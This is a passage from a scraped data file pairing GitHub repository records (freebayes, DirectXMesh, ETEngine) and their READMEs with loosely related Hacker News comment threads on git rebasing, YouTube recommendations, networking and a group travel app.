methods](http://bcbio.wordpress.com/2013/10/21/updated-comparison-of-variant-detection-methods-ensemble-freebayes-and-minimal-bam-preparation-pipelines/).\n\n## Development\n\nTo download freebayes, please use git to download the most recent development tree:\n\n git clone --recursive https://github.com/freebayes/freebayes.git\n\nIf you have a repo, update the submodules with\n\n git submodule update --init --recursive --progress\n\nOn Debian you'll need a gcc compiler and want packages:\n\n- bc\n- samtools\n- parallel\n- meson\n- ninja-build\n- libvcflib-tools\n- vcftools\n\nBuild dependencies are listed in [guix.scm](./guix.scm) and\n[travis](.travis.yml). Builds have been tested with gcc 7 and clang 9.\n\n## Compilation\n\nMake sure to have dependencies installed and checkout the tree\nwith `--recursive`.\n\nFreebayes can target AMD64 and ARM64 (with Neon extensions).\n\nRecently we added the meson build system which can be run with\n\n meson build/ --buildtype debug\n\nor to setup with clang instead\n\n env CXX=clang++ CC=clang CC_LD=lld meson build --buildtype debug\n\nNext compile and test in the ~build~ directory\n\n cd build\n ninja\n ninja test\n\nThe freebayes binary should be in\n\n build/freebayes\n\nTests on ARM may be slow. If you get a TIMEOUT use a multiplier,\ne.g.\n\n meson test -t 4 -C build/\n\nSee [meson.build](./meson.build) for more information.\n\n### Compile in a Guix container\n\nAfter checking out the repo with git recursive create a Guix\ncontainer with all the build tools with\n\n guix shell -C -D -f guix.scm\n\nSee also [guix.scm](./guix.scm).\n", "readme_type": "markdown", "hn_comments": "Good. https://www.amazon.com/Triumph-City-Greatest-Invention-Healt...I'm suspicious of the \"fundamental law of road congestion\".I suspect what the law reflects is that freeways don't get widened until it's so overdue that the widened version is already over-capacity.If someone complained that their web server was overloaded, and they tried increasing capacity but it was still overloaded so there's no point, you might say \"was this at Friendster?\"In the comments on the submitted story, there's an interesting mention\nof using \"sameAs\" links. I don't know much about them but there's some\nmore information on them in the links below.http://sameas.org/about.phphttps://www.w3.org/wiki/WebSchemashttps://www.w3.org/wiki/WebSchemas/sameAshttp://wiki.freebase.com/wiki/DBPediaAFAIK they don't expose Freebase ids as part of image search. You can get them through their Cloud Vision APIhttps://cloud.google.com/vision/docs/concepts#label_detectio...It's cute to seeing freebase ids surfaced in all sorts of projects. It's incredible how powerful and useful that project is.Interestingly, those mids are hashes of an earlier id system, which itself sourced from (i think,) wikipedia/en titles. There's kind of an accidental archaeology happening, from the anonymous hard-work of many smart people.Actual paper is here: http://research.google.com/pubs/archive/44818.pdfi'm pretty sure the simpler answer to this is to always merge, never use a fastfoward, never rebase and to accept history as what it is instead of trying to change it to make it 'more manageable' or whatever.changing the past to make a single linear thread is just weird imo.depending on what rebaseWithoutConflictsPossible() is doing it might be helpful though - doing a rebase is an opportunity for the merging algorithms to cause subtle problems, and taking things out of the context in which they were actually made reduces the utility of the history for seeing what was done. the more people you have working on different things at once, the more likely these problems will manifest as something real. if this rebaseWithoutConflictsPossible() check is looking for any potential conflict, not just the ones the algorithms get stuck on then i can see the utility... but its still not necessary if you never rebase and never fast-forward.\"git recursive merge doesn't screwup x% of merges in some linux kernel repo\" isn't an argument for it being useful in x% of cases so much as an argument for it causing damage in (100-x)% of cases. the many options available to tweak its behaviour to make it safer should be a giveaway that the merge feature is dangerous out of the box... the difficulty of resolving conflicts and dealing with merges is usually greatly overstated. a lot of programmers seem to have 'mergephobia'... i'm pretty sure we should just suck it up and do our jobs - learn that merges aren't that hard, and spend our time thinking about more important things. :)can you do it as a git alias or a binary you can install as git-freebase?Reminds me of this (fake) interview with Linus where he points out the \"easter egg\" in git:\"Eventually you\u2019ll discover the Easter egg in Git: all meaningful operations can be expressed in terms of the rebase command. Once you figure that out it all makes sense. I thought the joke would be obvious: rebase, freebase, as in what was Linus smoking? But programmers are an earnest and humorless crowd and the gag was largely lost on them.\"http://typicalprogrammer.com/linus-torvalds-goes-off-on-linu...Um, all I see is:> Oops! That page can\u2019t be found.> It looks like nothing was found at this location. Maybe try a search?Where'd it go?> Traditional techniques in git are terrible at documenting conflicts.What's the reason to document rebase conflicts?The permalink is broken for me (404) but it's still listed on the blog landing page: http://ericrie.se/blog/How is this different from git-smart?How is this different from git-smart?If your branch conflicts, rebase off master (the branch you're making a pull request to). Then it will merge cleanly. There's no practical downsides to having merge commits in master, but you should never (or rarely) see merge conflict resolution commits. You should be able to rebase to a mergeable state before merge.Interesting. Basically a commit to remember a conflict when rebasing. Not entirely my cup of tea as I prefer less noise but helpful for some if conflicts generate lost work too often. I find it annoying when see commits on a PR that says \"fixing rebase conflicts\" etc. \"rebase continue\" should have inlined those changes to the relevant commit.My simpler suggestion to avoid unnecessary merges is to try to wrap an alias around merge that simple just prompts whether they tried to rebase first. If you need to merge it often smells like a branch has existed too long.The author never elaborates on why exactly he thinks this is needed. I think reading between the lines the reason is that if someone's done a merge/rebase and screwed up a conflict resolution the information about how that's happened is lost forever, so let's come up with some hack to save that information in case there was a conflict.If that's the case, a solution that would categorically lose less information would be:1. You're going to push branch you/whatever2. You rebase you/whatever on on master3. You solve whatever conflicts you have4. You make a non-fast-forward merge commit to indicate that you/whatever was rebased as a series with a name5. You push your conflict resolved & rebased you/whatever branch to master6. You push the original you/whatever as unrebased/you/whateverNow you have the original unrebased commits in your repository, you can now simply inspect your history to see what the original commits were, how they conflicted, and how those conflicts were resolved.Once branches in unrebased/* get old enough you just delete them. In my experience the importance of seeing how someone did something in source control is inversely proportional to how recently it was committed.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "microsoft/DirectXMesh", "link": "https://github.com/microsoft/DirectXMesh", "tags": ["microsoft", "directx", "directx-11", "directx-12", "cpp-library", "geometry-processing", "xbox", "directxmesh", "uwp", "desktop"], "stars": 655, "description": "DirectXMesh geometry processing library", "lang": "C++", "repo_lang": "", "readme": "![DirectX Logo](https://raw.githubusercontent.com/wiki/Microsoft/DirectXMesh/X_jpg.jpg)\n\n# DirectXMesh geometry processing library\n\nhttp://go.microsoft.com/fwlink/?LinkID=324981\n\nCopyright (c) Microsoft Corporation.\n\n**December 15, 2022**\n\nThis package contains DirectXMesh, a shared source library for performing various geometry content processing operations including generating normals and tangent frames, triangle adjacency computations, vertex cache optimization, and meshlet generation.\n\nThis code is designed to build with Visual Studio 2019 (16.11), Visual Studio 2022, clang for Windows v12 or later, or MinGW 12.2. Use of the Windows 10 May 2020 Update SDK ([19041](https://walbourn.github.io/windows-10-may-2020-update-sdk/)) or later is required for Visual Studio. It can also be built for Windows Subsystem for Linux using GCC 11 or later.\n\nThese components are designed to work without requiring any content from the legacy DirectX SDK. For details, see [Where is the DirectX SDK?](https://aka.ms/dxsdk).\n\n## Directory Layout\n\n* ``DirectXMesh\\``\n\n + This contains the DirectXMesh library.\n\n> The majority of the header files here are intended for implementation the library only (``DirectXMeshP.h``, ``scoped.h``, etc.). Only ``DirectXMesh.h`` and ``DirectXMesh.inl`` are meant as a 'public' headers for the library.\n\n* ``Utilities\\``\n\n + This contains helper code related to mesh processing that is not general enough to be part of the DirectXMesh library.\n * ``WaveFrontReader.h``: Contains a simple C++ class for reading mesh data from a WaveFront OBJ file.\n\n* ``Meshconvert\\``\n\n + This DirectXMesh sample is an implementation of the ``meshconvert`` command-line texture utility from the legacy DirectX SDK utilizing DirectXMesh rather than D3DX.\n\n> This tool does not support legacy ``.X`` files, but can export ``CMO``, ``SDKMESH``, and ``VBO`` files.\n\n* ``build\\``\n\n + Contains YAML files for the build pipelines along with some miscellaneous build files and scripts.\n\n## Documentation\n\nDocumentation is available on the [GitHub wiki](https://github.com/Microsoft/DirectXMesh/wiki).\n\n## Notices\n\nAll content and source code for this package are subject to the terms of the [MIT License](https://github.com/microsoft/DirectXMesh/blob/main/LICENSE).\n\nFor the latest version of DirectXMesh, bug reports, etc. please visit the project site on [GitHub](https://github.com/microsoft/DirectXMesh).\n\n## Release Notes\n\n* Starting with the June 2020 release, this library makes use of typed enum bitmask flags per the recommendation of the _C++ Standard_ section *17.5.2.1.3 Bitmask types*. This is consistent with Direct3D 12's use of the ``DEFINE_ENUM_FLAG_OPERATORS`` macro. This may have *breaking change* impacts to client code:\n\n * You cannot pass the ``0`` literal as your flags value. Instead you must make use of the appropriate default enum value: ``CNORM_DEFAULT``, ``VALIDATE_DEFAULT``, or ``MESHLET_DEFAULT``.\n\n * Use the enum type instead of ``DWORD`` if building up flags values locally with bitmask operations. For example, ```CNORM_FLAGS flags = CNORM_DEFAULT; if (...) flags |= CNORM_WIND_CW;```\n\n* The UWP projects and the Win10 classic desktop project include configurations for the ARM64 platform. Building these requires installing the ARM64 toolset.\n\n* When using clang/LLVM for the ARM64 platform, the Windows 11 SDK ([22000](https://walbourn.github.io/windows-sdk-for-windows-11/)) or later is required.\n\n## Support\n\nFor questions, consider using [Stack Overflow](https://stackoverflow.com/questions/tagged/directxtk) with the *directxtk* tag, or the [DirectX Discord Server](https://discord.gg/directx) in the *dx12-developers* or *dx9-dx11-developers* channel.\n\nFor bug reports and feature requests, please use GitHub [issues](https://github.com/microsoft/DirectXMesh/issues) for this project.\n\n## Contributing\n\nThis project welcomes contributions and suggestions. Most contributions require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us the rights to use your contribution. For details, visit https://cla.opensource.microsoft.com.\n\nWhen you submit a pull request, a CLA bot will automatically determine whether you need to provide a CLA and decorate the PR appropriately (e.g., status check, comment). Simply follow the instructions provided by the bot. You will only need to do this once across all repos using our CLA.\n\n## Code of Conduct\n\nThis project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/). For more information see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) or contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with any additional questions or comments.\n\n## Trademarks\n\nThis project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft trademarks or logos is subject to and must follow [Microsoft's Trademark & Brand Guidelines](https://www.microsoft.com/en-us/legal/intellectualproperty/trademarks/usage/general). Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. Any use of third-party trademarks or logos are subject to those third-party's policies.\n\n## Credits\n\nThe DirectXMesh library is the work of Chuck Walbourn, with contributions from Dr. Hugues Hoppe, Alex Nankervis, James Stanard, Craig Peeper, and the numerous other Microsoft engineers who developed the D3DX utility library over the years.\n\nThanks to Matt Hurliman for his contribution of the meshlet generation functions.\n\nThanks to Adrian Stone (Game Angst) for the public domain implementation of Tom Forsyth's linear-speed vertex cache optimization, and thanks to Tom Forsyth for his contribution.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Illation/ETEngine", "link": "https://github.com/Illation/ETEngine", "tags": ["game-engine", "planet-generator", "planet-renderer", "real-time-rendering", "pbr", "opengl", "resource-manager", "gtkmm", "ecs", "ecs-framework", "entity-component-system", "data-oriented-design", "game-development", "3d", "3d-game-engine", "editor", "3d-editor", "data-driven", "cpp14", "c-plus-plus"], "stars": 655, "description": "Realtime 3D Game-Engine with a focus on space sim. Written in C++ 14", "lang": "C++", "repo_lang": "", "readme": "\n\n***********************************************************************************\n\n\n\n\n\"Discord\"\n\n#### Realtime 3D Graphics/Simulation/Game-Engine written in C++ 14.\n\n***********************************************************************************\n\nFocus is on ease of use, extensibility, performance and providing rendering features for planet scale environments, enabling space games and simulations.\n\n__E.T.__ stands for \"extra terrestial\" due to the goal for this technology to go to space one day.\n\nThis project is under active development, and while a wide range of features are implemented and the overall architecture is approaching a cohesive state, many of the planned improvements are likely to touch a large crossection of the codebase.\nTherefore, while breaking changes are usually implemented in separate branches, the interface on the master branch changes relatively frequently.\n\n
\n\"PBR\"\n\n### Discuss it on [Discord](https://discord.gg/PZc37qPwVC)!\n\n
\n\n***********************************************************************************\n\n\n## Features:\n\n\n#### Rendering\n\n\"PBR\"\n\"from\n\nRendering is based on modern principals including Physically based Rendering.\nThe data driven material system allows for custom shaders and parameter inheritance through material instances (similar to UE4).\nA variety of rendering features aimed at space simulation have been implemented, such as planet terrain generation, atmospheric scattering and Starfields based on real sky data.\n\n#### Modular Architecture\n\n\n\nThe project is split into multiple libraries. Low level libraries such as core or rendering can be used independently from high level ones such as the framework.\nMany features have interfaces and implementations, allowing overriding of functionality. If you want to implement your own renderer or support a different file system, you can do that.\n\n#### Data oriented design\nMany performance critical sections have been programmed with aspects such as cache locality in mind.\nThe renderer uses an optimized scene structure and can operate independently from the gameplay side scene.\nGameplay features are implemented using an Archetype based Entity Component System.\n\n#### Data Driven\nAnything that is not a behavior can be described with data. The Resource manager allows for custom asset types. \nReflection of data structures allows for automated serialization and deserialization of content.\nThe work in progress editor will allow for easy editing, and control the workflow from Content creation tools to optimized engine formats.\n\n
\n
\n\n![](./screenshots/Editor.jpg)\n\n\n## How to build\n\nFor visual studio 2017:\n\n git clone https://github.com/Illation/ETEngine\n cd ETEngine/Projects/Demo\n cmake -G \"Visual Studio 15 2017 Win64\" -S . -B build\n cmake --build build --target all --config Develop\n cmake --build build --target install\n cmake --build build --target cook-installed-resources-EtEngineDemo\n\nFor more information (including unit tests and content cooking) check [the build documentation](doc/building.md).\n\n\n## Continuous Integration\n\nDue to an [issue](https://github.com/Illation/ETEngine/issues/17) with library dependencies CI is currently not working. However the project has been built outside of automated build scripts and works just fine.\n\n## Background\n\nThis project started off in 2016 as an [OpenGL graphics framework](https://github.com/Illation/GLFramework) based on the \"Overlord Engine\" (Dx11) from the Graphics Programming course at [Howest University](https://www.digitalartsandentertainment.be/)\n\nIn parallel I was writing my graduation work on [realtime planet rendering](https://github.com/Illation/PlanetRenderer), and in 2017 I merged the two projects into this engine. \n\nSince then I added a variety of graphics and gameplay features, however due to the design at the time this was getting increasingly difficult.\n\nTherefore, starting in 2019, the main focus has been on improving the Architecture and focusing on useability and extensibility, and the codebase has been nearly completely rewritten since. \n\n#### Approximate Changelog\n\n__0.0 :__ \n * Initial OpenGL Graphics Framework implementation\n\n__0.1 :__ \n * Virtual File System\n * Deferred rendering\n * Physically based rendering\n * Post processing\n * Planet rendering \n * atmospheric scattering\n\n__0.2 :__ \n * Custom math library\n * Physics and Audio integration\n * Unit testing\n * Continuous integration\n * Json parser, GLTF\n\n__0.3 :__ \n * CMake build\n * Separate core library - update system\n * reflection; serialization / deserialization\n\n__0.4 :__ \n * Resource Manager, Asset Database\n * Package file format\n * Cooker\n * Asset Pointer\n\n__0.5 :__ \n * GTKmm based editor app\n * Abstract Graphics API\n * Cross context rendering viewport - support for multiple (3D) viewports\n * Flexible editor tool windowing system\n\n__0.6 :__ \n * Separated rendering / framework / runtime libraries\n * Optimized render scene with minimal graphics objects - scene renderer no longer traverses scene graph\n * Data driven material system\n\n__0.7 :__ \n * Archetype based Entity Component System\n * Removed previous scene graph structure, all game object behavior is expressed through components and systems\n * Scene Descriptor asset - scenes now described in files\n * Application Runtime and Editor can share custom data assets through common library\n \n## Third Party\n\nFor a list of third party libraries and licenses check [HERE](Engine/third_party/README.md).\n\n## Screenshots\n\n#### Atmosphere and Planets\n\n\"upper\n\"atmospheric\n\n\"Stars\"\n\"surface\n\n#### Render Pipeline; Physics\n\n\"Lights\n\"3D\n\n![](./screenshots/BulletPhysics.jpg)\n", "readme_type": "markdown", "hn_comments": "To me paying the fee for YouTube is utterly rational. I get enormous pleasure out of YouTube without commercials. I too am exceptionally frustrated with their algorithms. They have never got my taste even remotely right.I think Youtube has ran its course. Google knows Youtube is no longer the money maker it once was, and is knowingly (either literally so, or by using algorithms they can blame and plead ignorance) pushing spicy content to get you to interact.This isn't a zero sum game: every time you tell it \"don't recommend\" and \"not interested\", that is an interaction, too. You are on Youtube instead of some other website or service. This is the attention economy equivalent of a loss leader.If you believe Youtube no longer serves you, quit. This goes for any other service, too.It's really simple. It's the same reason ChatGPT doesn't mean the end of human creative labor.ML isn't perfect.That's it. You found a false negative.The funniest I've ever had was an audiobook of Mein Kampf appearing as my top recommendation.I think I've spoke about this here previously, but I do feel YouTube radicalised me in my early 20s. In my case though it was from the left, not the right, and ack then there was no real recommendation algorithm. There was trending videos and subscriptions, but if I remember correctly the only recommended stuff was basically just related content next to videos.Personally I don't know if the current recommendation algorithm is any worse than the subscription feed. I think we humans might actually just be drawn to more extreme or \"pure\" versions of our own beliefs. At least I feel this is true for myself as it's something I have to actively fight all the time.A good example of people being drawn to more extreme versions of their own beliefs is TV news. People who watch CNN don't watch Fox News and people who watch Fox News don't watch CNN. This self-selection of media content serves to amplify political division and radicalise people because most people will only watch and read what they already agree with when they have to pick the content.So I think there's an argument to be made here that while not perfect the YouTube recommendation algorithm might actually be better than the old way of consuming content by personal selection. And I guess the fact you were recommended something you so strongly disagree with that you wrote this post you're kind of proving what I've been thinking. This recommendation clearly didn't serve to radicalise you, but for better or worse it might have helped you understand what people you wouldn't normally interactive with actually think on some subject matter. And sometimes you had the perspective, but I find I often that's not the case.So yeah, while YouTube sometimes recommends me crazy stuff, I no longer have a list of 50 far-left videos waiting for me when I open the site. And while I find what I'm recommended is still biased to my personal preferences, it's less biased then myself.It seems like the algorithm recommended you a video and then you clicked on it and watched it or at least read the description for it but then you clicked don't recommend and not interested.I mean how else did you know what this leather apron club was? You seem to of described the content of the video that was recommended as if you watched it or clicked on it or interacted with it in some positive manner.You sent a conflicting signal to YouTube by investigating the content that you don't want to be recommended by interacting with it a whole bunch.Next time you get recommended things that you don't want to be recommended I'm going to recommend to you to not interact with it at all. Don't click on it don't do anything that is considered engagement to it.I also use YouTube a bunch and I also pay for YouTube premium. All of my recommends are extremely accurate and that is because the only thing that I view or consume are things that I want to view or consume.I don't click on things I disagree with or would be offended by I don't click on shorts because I hate that entire concept of content and I don't click on trash content like haha funny viral videos because I am under the complete understanding that interaction and engagement are what drive the algorithm that recommends me content.I could get totally rabbit holed and click on this stuff that every once in awhile it tries to recommend me that is slightly outside of my bubble in order to research it and find out why it tried to recommend me this. but you know what that would do? It sends a signal to them that I clicked on the video and then I clicked on their homepage to find out more and then I clicked on their about to look at other channels associated with it maybe I clicked on a couple more videos to find out if all of their content is like this maybe I clicked on videos on the side that are related to the video that it thinks I would be interested in if I like the video I'm currently clicked on and all of these are positive signals that feed the recommendation engine to give me more things that I don't want to be given.And I'll go as far as to say I wouldn't even do that in an incognito tab or from the same IP address or from the same computer because it will somehow leak into my logged in normal account.I guess I also want to put forth the idea that the negative signal that you put out by saying you don't want to be recommended something is possibly exponentially weaker to the recommendation engine then any amount of investigatory engagement that you do. You say AI a lot and frankly this is how YouTube's recommendation engine has worked for a very long time and I think it's going to be an even longer time and it's going to require more invasive analytics for YouTube to be able to have the ability to pick up on intent of a click. Because that's what this really revolves around. If a human was behind the recommendation engine and you were able to small talk with said human during your frustration of investigating why you're being recommended something then that human would understand to ignore this engagement.Chances are someone you link to (either following their channel or through some other metric) has engaged with that content, and so Youtube believes that you're more likely to engage with it as well, if you have overlapping interests. It may be a relationship several orders removed from you - but Youtube still counts it.> If anything, because I was so puzzled by what was happening that I looked at who this Leather fellow was, Youtube\u2019s trillion dollar \u201cAI\u201d tech stack will probably serve more and more of this stuff.So... it worked. You seem to be confused about the goals of Youtube's algorithm - it isn't to show you the content you're most interested in, per se, it's to show you the content you're more likely to add value to by engagement. That can and often does correlate to your interests, but controversy works just as well, which is why these platforms often incentivize controversy over quality. Sometimes they'll throw random stuff into your feed just so see if you'll bite.Consider deleting your view history if you haven't already. Go through your subscriptions and see who they're following. Absolutely do not click on more than one of someone's video if you don't want to get flooded with their content.Their AI sucks, this is what happens when a site curates their feed instead of just using hashtags+views+popular.I've been using pockettube addon and just add my favorite channels to groups. Now I can just watch tech, and get my favorite tech shows. Cars, Music, etc. Plus I get uncensored and time/popular feeds sort views again for each of my groups. This is 10000% better than clicking \"subscriptions\".Sad people are just herded like sheep on what content they consume.https://pockettube.io/Had a similar problem, wrote some js for TamperMonkey, and now TM runs my script whenever Youtube.com/* is loaded.Youtube doesn't decide what I see, I decide that. Youtube merely offers me data that I filter.Seems taking the web into my own hands is the only solution for this, I'm sure Youtube and other sites couldn't care less about their users.It's kind of funny that this is a thing too. Sometimes, I'll get the pop culture outrage grifters recommended to me since I like to dip into the current events regarding comic books. Otherwise, I get just random junk. Recommendations to view uploaded movie clips or whatever but nothing close to what I regularly watch. I always feel like the Youtube recommendation system is flakey. It doesn't even pick up the fact that I'm subscribed to a ton of small channels for cooking and rarely puts their content on the feed. It's wild I swear.For what it\u2019s worth, I also have YouTube Premium and watch a lot of gun content and conservative political content on YouTube, and I don\u2019t think I\u2019ve ever been recommended any sort of explicitly anti-Semitic or neo-Nazi content.I do suspect that the recommendation algorithm for Premium is slightly different and perhaps more favorable to gun content. Pretty much all gun content is demonetized, and anything that\u2019s demonetized gets recommended less; I suspect Premium is an exception to this. Also, there may be more gun content than usual lately because SHOT Show, a trade show for the gun industry, is happening this week.> I like it so much that I pay the utterly economically irrational Youtube Premium monthly fee just to skip ads.I use uBlock Origin and haven't seen an ad on Youtube in years.[dead]Turn off your watch and search history, then install a plugin that redirects you from the home page to the subscription page. Your recommendations will turn to whatever you have in your subscriptions, videos similar to what you're currently watching and an occasional super popular video that will stay in your recommendations until you click on it. It's pretty bad but it's still much better than the garbage it's serving you with the default settings.The YouTube recommendation system is optimized to direct all users toward pools of content that have the highest amount of watch time. The AI has learned about various paths that get users to watch for longer amounts of time. One of those paths is right-wing polemics. Another path is, say, makeup tutorials. It's not inherently political.Purely by its own machine learning, the YouTube algorithm becomes sophisticated at inching people toward the high-watchtime material. There is no mal intent. There's no intent at all except for revenue. The AI doesn't \"know\" what the content of the reactionary videos even is. All it \"knows\" is that people who get there watch longer, and that people get there by way of other interests, such as martial arts, history, or guns. It also \"knows\" that this transition has to happen gradually to succeed. The recommendation progression is subtle:Martial arts -> combat -> guns/militaria -> liberals are coming to seize your gunsMartial arts -> combat -> guns/militaria -> look at this neat Nazi gun -> were the Nazis so wrong???Martial arts -> MMA -> Joe Rogan -> Jordan Peterson -> feminism is destroying Western civilizationMartial arts -> MMA -> Joe Rogan -> (((George Soros))) is a space reptileYour line of questioning assumes that this process is malfunctioning, when in fact it is working as intended. You're correct that it's ethically grotesque, but since when have companies ever taken responsibility for externalities without being compelled to via regulation? YouTube has the legal right to host and broadcast whatever (non-obscene, non-copyrighted) content makes it the most money. The only free-market answer would be advertisers pulling money, which they occasionally do as a disciplinary mechanism. But if the advertisers don't really care, well...I regularly get recommendations for extremist content on Youtube, even though it's not thematically related to anything I already watch. The most harmless ones are Jordan Peterson and Andrew Tate videos, but not too far behind is conspiracy stuff, fundamentalist religious channels, \"spiritual\" videos about faith and ghosts and living the Matrix. Like you, I used to click on the options to little effect, so now I just ignore them. It's actually a running joke with my friends that in the YT app on my iPad I often get an extremist suggestion exactly in the third slot of the suggested videos list.Here's my theory on why that happens: Youtube knows I'm male, kind of old, a tech nerd, and that I likely don't have any kids or a wife. That's it. It's the kind of content I'm supposed to like in my gender/age/status cohort.[flagged][flagged]I have seen this as well. What in the world is going on at Google?One thing to consider about the \"As far as I can tell those buttons aren\u2019t connected to anything on the back-end.\" idea is - if a new channel or video comes out, the algorithm might not know its undesirable to people in your cluster until enough unlucky people in your cluster is served that poor video recommendation and hits that button, at which point the ML has sufficient labels to start avoiding serving that video to people with similar preferences to you.But there's an endless amount of new content, and new content has a period before its properly labeled and sorted into the right filter bubbles, so you will likely never get to a world where you don't have to see that stuff.I have very nerdy and musical follows, no violence of any sort that I can think of other than the occasional snarky vlogger but even those tend to get pruned. I did find that the NI/DRTC method did help me to prune all political content - I do subscribe to one political show for sure because it's genuinely funny (even they rarely get much of a watch these days though), but with a concerted effort over a good week of daily instruction I got it to stop recommending all the talentless pandering pundits of the same stripe who desire my attention.The real concern is if Google really has accepted money from this channel in exchange for access to the feeds of people who are into violent content. To say that scenario is believable is an understatement, but to believe it is dark. I'd prefer not to.I had a chance to reflect on this overnight. I apologize that the initial rant was not written very well. I had to get it out and off my chest but was multitasking to hit a parallel real life deadline elsewhere.My personal answer to all of this is that YouTube is a failed product for me. It may serve some general consumption/ad revenue production use case but it is a terrible product for a self-directed \u201cpower user.\u201d I see the situation analogous to Twitter. The benefits of the platform are too powerful to entirely leave behind but horribly deficient to what they could be and there is no real alternative because of monopoly. YouTube in my view long ago stopped focusing on providing more value in a two sided market between content consumers/creators and shifted to pure monopoly resource extraction. I\u2019m sure there are alternative emerging platforms but the logic of natural monopolies in two sided markets makes it brutally hard for any of them to reach critical useful scale.But I realize I\u2019ve gotten very lazy over the past decades and outsourced far too much power to the platform companies. Business is always some combination of providing value to your customers and extracting value for yourself but too many of these platforms have lost the balance. I\u2019m tired of being the product even when I try to provide an alternative paid revenue stream to opt out of that deal.Annoying and painful as it will be (I\u2019m at a point in life where I no longer have bandwidth to self-hack every thing) I am going to have to reclaim big chunks of my digital autonomy. Thanks all for the great discussion here.In person meetups are good. Some of the online 'code and coffee' events also are good chances to do some networking.> What else should I try?Lowering your standards.Define your goals in networking. Get more specific with whom you want to meet and why.Find out where those people are spending time online and IRL. Determine how closely you are connected to them and if anyone you know can make an introduction.Go to conferences and do your best to have quality conversations with several people.Create content for the kind of people you want to meet.Make friends with some one who does network full time. People who are not engineers basically.Make a google spreadheet[1] with the list of your old industry contacts. Research. Prioritize. Start calling/messaging them. Say you want to catch up. Either have a catch up talk on the phone, and if they like it set up a coffee meeting (coffee on you;).Before COVID I networked a lot. This is how I re-building my network.--1. it can be any CRM tool really, but better to keep it simpleNeat! The mix of (a) planning trips for groups of friends and (b) opening up trips to folks you don't know is nice.On a related note, I'm willing to personally act as a travel agent for a remote co-working trip among coworkers as a non-scaleable way to grow the platform initially and get user feedback. If you're interested in exploring in a fun 4-10 person trip with colleagues, email me at ben@villagersapp.com.I think you should change your demo trip, I clicked on it and got annoyed about how pedantic (for lack of a better word I can think of) the 'rules' were: Trip Rules\n No pets\n No parties\n Quiet after 11pm\n Alcohol allowed\n No drugs\n No marijuana allowed\n\nI mean it is realistic for a yoga trip, but in a demo you'd want to showcase the most fun way to use this, not the most patronising way.just wanted to say - this is well designed, clean interface, and fast (on my desktop). Well done, especially if you solo developed this.Interesting idea. When I tap \"Plan A Trip\", the box color highlights, but nothing happens, and I don't see a way to get beyond that page.Cool, there is def some things to do with nomad trips. Thinking of working online + doing an activity altogether like Kitesurfing, skiing, scuba diving, freediving, paragliding etc.Any other locations / dates that I could propose that would interest folks?I'm always fascinated by group travel apps although I certainly haven't seen a successful uber-app for managing all aspects of a trip.I like the focus here on getting commitment from participants. That can be so challenging when putting together a trip.It doesn't look like Villagers handles everything (and that's ok!) - e.g. when I went to create a new trip I noticed it looks like everything is based on having a single location - you can't set up lodging in location A for the beginning of a trip, have a few days on the trail hiking, and the lodging for the end of trip in location B (unless I missed it).EDIT: Oh, and it looks like the lodging HAS to be an AirBNB (the field validates that the AirBNB URL contains AirBNB.com). That's certainly limiting.This is always an interesting app idea to me, but after trying group trips few ways with people, the most successful have been loosely coupled:Pick a geographical location. Pick some dates that overlap. Plan your own trip. Keep things decoupled.Then, just find times that you want to meet up. Just like regular life.For things that require coordination, like a camping/canoe trip, email works well.Link to demo page hijacked my \"back\" button, not a fan.Kudos on the site design; fast, responsive, clean. Are you able to you tell us about your stack?Am I right in thinking that it's essentially Facebook Events but traveling?This is a problem as old as time. Over a decade ago I saw startups from Stanford trying to tackle this. This is not an expert perspective, but I believe the market is too small to really make it worth while. As alluded to, people in their 30s/40s lean into their family, children's activities etc.Why does the start date have to be at least 10 days in advance?I live in Vegas (technically Henderson) and I'd love to join for the climbing.What is your opinion on [0] ?I disagree with him about \" My best guess is that a truly great consumer service needs to be something that is can be used every day. \" I use Wanderlog (YC19) almost every trip I do, a lot of my friends after I recommended this tool started using it. Yet it is kinda right - Wanderlog doesn't seem to be making big progress, although pandemic is probably responsible for that[0] https://blog.garrytan.com/travel-planning-software-the-most-...I'd love to be able to see other peoples' past trip itineraries to get ideas about what things I might want to add to my own itinerary and how to structure it.looks awesome! I have also been working on a similar app in my free time. Looks like several people had this idea during covid since we all miss that in person interaction.My favorite tool for coordinating locations with people is What 3 Wordshttps://what3words.com/The map of the world is split into 3x3 meter squares with a unique three-word ID for each, e.g: twig.fleet.likely> Alcohol allowed> No drugs???> with verified identities (license or passport).Also, hope you've thought through storing personal info like passports and driving licences mate. Not just for GDPR, but if you don't have liability insurance and a good legal team you are asking for trouble. Hope you don't get any data breaches!I don't really like climbing but this app looks fun. Would be especially interested in trips with other foundersGood luck! Sounds like fun!I doubt the defense industry is a good place for VC funded start-up. Growth is hopefully pretty limited.But I got to ask why?Sure, the world feels rocky at the moment, there's a war, energy prices a soaring, inflation, and we're all waiting for a recession we expect to happen.But, that doesn't mean wars are going to be more frequent.I'm sure the defense sector has opportunities to make a good buck. But if you want to change the world, I doubt that's where it'll be happening.I am a Ukrainian but I haven't understood your question. First video has some cite from Bible which means a no-go for me, second link is something paywalled, only third article is understandable.upd: Also I can understand your nickname, this is a famous military meme about kilroy.Fwiw... I've seen that Steve Blank video on the Secret History of Sili Valley and highly recommend it.How does it compare with https://www.vcluster.com/ which also available as open source?Amazing work Arjun & Anirudh! I know you have been working on this for a while! What has been your biggest lesson learned building such a sophisticated devtool?Congratulations Arjun & Anirudh!Exited to see tools for testing microservices early in the development lifecycle.Wish you best of luck.One thing that maybe is just wooshing over my head, but how does persistence fit into this, at least as best practices?The way I understand this tool from the docs, is that a request is duplicated to go to the baseline service A as well as service A' -- so service A on `main` branch is actually serving the up to date code, while service A' has modifications that developers can quickly see either work or blow up. What happens if the change is a DB write change? Do both A and A' point to a primary prod DB and if A' changes something in that results in bugged data, wouldn't that screw up prod data? How do I go about accounting for that? Or am I just entirely misunderstanding the point of this tool?EDIT: I think I just bumped into my own answer within the docs -- \"Sandbox Resources.\" I see so far you have Mysql/Maria, SQS, and Rabbit 